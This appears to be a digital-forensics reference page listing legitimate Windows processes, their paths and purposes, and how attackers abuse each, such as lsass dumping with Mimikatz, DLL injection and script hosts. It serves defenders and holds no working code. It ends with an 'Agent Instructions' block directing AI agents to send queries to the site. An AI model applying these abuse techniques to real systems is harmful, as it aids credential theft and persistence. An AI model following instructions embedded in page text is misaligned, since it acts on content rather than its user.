# legitimate Windows processes ## **1. System-Level Processes** **`System`** * **Path:** N/A (Kernel-level process) * **Purpose:** Manages core operating system functions, including hardware interactions. * **Attack Use:** Rarely targeted directly but used to hide malicious activity in kernel-mode attacks **`smss.exe` (Session Manager Subsystem)** * **Path:** `C:\Windows\System32\smss.exe` * **Purpose:** Handles session initialization during system startup. * **Attack Use:** Rarely abused; critical to system stability. **`csrss.exe` (Client/Server Runtime Subsystem)** * **Path:** `C:\Windows\System32\csrss.exe` * **Purpose:** Manages graphical and console operations. * **Attack Use:** Sometimes mimicked in process injection attacks. **`wininit.exe` (Windows Initialization)** * **Path:** `C:\Windows\System32\wininit.exe` * **Purpose:** Starts system services during boot. * **Attack Use:** Rarely abused; attackers may spoof this process for persistence ## **2. Service Host Processes** **`svchost.exe` (Service Host)** * **Path:** `C:\Windows\System32\svchost.exe` * **Purpose:** Hosts Windows services (e.g., network services, updates). * **Attack Use:** Common for malicious DLL injection and privilege escalation. **`services.exe` (Service Control Manager)** * **Path:** `C:\Windows\System32\services.exe` * **Purpose:** Manages services and their startup processes. * **Attack Use:** Used to register malicious services for persistence ## **3. User-Level Processes** **`explorer.exe` (Windows Explorer)** * **Path:** `C:\Windows\explorer.exe` * **Purpose:** Manages the desktop, taskbar, and file explorer. * **Attack Use:** Often abused for persistence via COM hijacking or DLL injection. **`taskhostw.exe` (Task Host)** * **Path:** `C:\Windows\System32\taskhostw.exe` * **Purpose:** Hosts dynamic-link libraries (DLLs) for tasks and processes. * **Attack Use:** Used to execute malicious DLLs. **`dllhost.exe` (COM Surrogate)** * **Path:** `C:\Windows\System32\dllhost.exe` * **Purpose:** Hosts COM objects that do not run in the main application. * **Attack Use:** Common for COM hijacking to execute malicious DLLs. **`cmd.exe` (Command Prompt)** * **Path:** `C:\Windows\System32\cmd.exe` * **Purpose:** Command-line interface for executing scripts and commands. * **Attack Use:** Used to execute commands or scripts stealthily. **`powershell.exe` (PowerShell)** * **Path:** `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` * **Purpose:** Scripting tool for automation and management tasks. * **Attack Use:** A primary tool for attackers due to its powerful scripting capabilities. ## **4. Network and Communication Processes** **`lsass.exe` (Local Security Authority Subsystem Service)** * **Path:** `C:\Windows\System32\lsass.exe` * **Purpose:** Manages user authentication and password validation. * **Attack Use:** Dumped to extract credentials using tools like Mimikatz. **`winlogon.exe` (Windows Logon Application)** * **Path:** `C:\Windows\System32\winlogon.exe` * **Purpose:** Manages user logon sessions. * **Attack Use:** Hijacked for persistence. **`mstsc.exe` (Remote Desktop Client)** * **Path:** `C:\Windows\System32\mstsc.exe` * **Purpose:** Remote desktop connections. * **Attack Use:** Used to interact with compromised systems remotely. **`rundll32.exe` (Run DLL as an App)** * **Path:** `C:\Windows\System32\rundll32.exe` * **Purpose:** Executes functions from DLLs. * **Attack Use:** Abused to execute malicious payloads. **`wscript.exe` and `cscript.exe` (Windows Script Host)** * **Path:** `C:\Windows\System32\wscript.exe` / `C:\Windows\System32\cscript.exe` * **Purpose:** Runs scripts like VBScript and JScript. * **Attack Use:** Executes malicious scripts ## **5. Scheduled Task and Utility Processes** **`schtasks.exe` (Task Scheduler)** * **Path:** `C:\Windows\System32\schtasks.exe` * **Purpose:** Schedules and manages tasks. * **Attack Use:** Creates tasks for persistence or delayed execution of malware. **`taskmgr.exe` (Task Manager)** * **Path:** `C:\Windows\System32\taskmgr.exe` * **Purpose:** Monitors running processes and system performance. * **Attack Use:** Rarely targeted but useful for detecting malicious processes. ## **6. Browser and Media Processes** **`msedge.exe` (Microsoft Edge)** * **Path:** `C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe` * **Purpose:** Internet browsing. * **Attack Use:** Rarely targeted directly; browser vulnerabilities are exploited instead. **`wmplayer.exe` (Windows Media Player)** * **Path:** `C:\Program Files (x86)\Windows Media Player\wmplayer.exe` * **Purpose:** Plays media files. * **Attack Use:** Abused to execute malicious media files. ## **7. System Update Processes** **`wuauclt.exe` (Windows Update Client)** * **Path:** `C:\Windows\System32\wuauclt.exe` * **Purpose:** Manages Windows updates. * **Attack Use:** Rarely abused; attackers may spoof update mechanisms ## **8. Administrative and Diagnostic Tools** **`regedit.exe` (Registry Editor)** * **Path:** `C:\Windows\System32\regedit.exe` * **Purpose:** Edits the Windows Registry. * **Attack Use:** Used to modify Registry keys manually or programmatically. **`msiexec.exe` (Windows Installer)** * **Path:** `C:\Windows\System32\msiexec.exe` * **Purpose:** Installs MSI packages. * **Attack Use:** Executes malicious installation packages. **`perfmon.exe` (Performance Monitor)** * **Path:** `C:\Windows\System32\perfmon.exe` * **Purpose:** Monitors system performance. * **Attack Use:** Rarely abused but could be used for reconnaissance ## **Processes Often Targeted by Attackers** 1. **High Privilege Processes:** * `svchost.exe` * `lsass.exe` * `winlogon.exe` 2. **Versatile Execution Processes:** * `powershell.exe` * `cmd.exe` * `rundll32.exe` * `mshta.exe` * `reg.exe` * `certutil.exe` 3. **Service and Communication Processes:** * `dllhost.exe` * `explorer.exe` 4. **Automation and Scripting Processes:** * `wscript.exe` * `cscript.exe` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mahmoud-shaker.gitbook.io/dfir-notes/legitimate-windows-processes.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.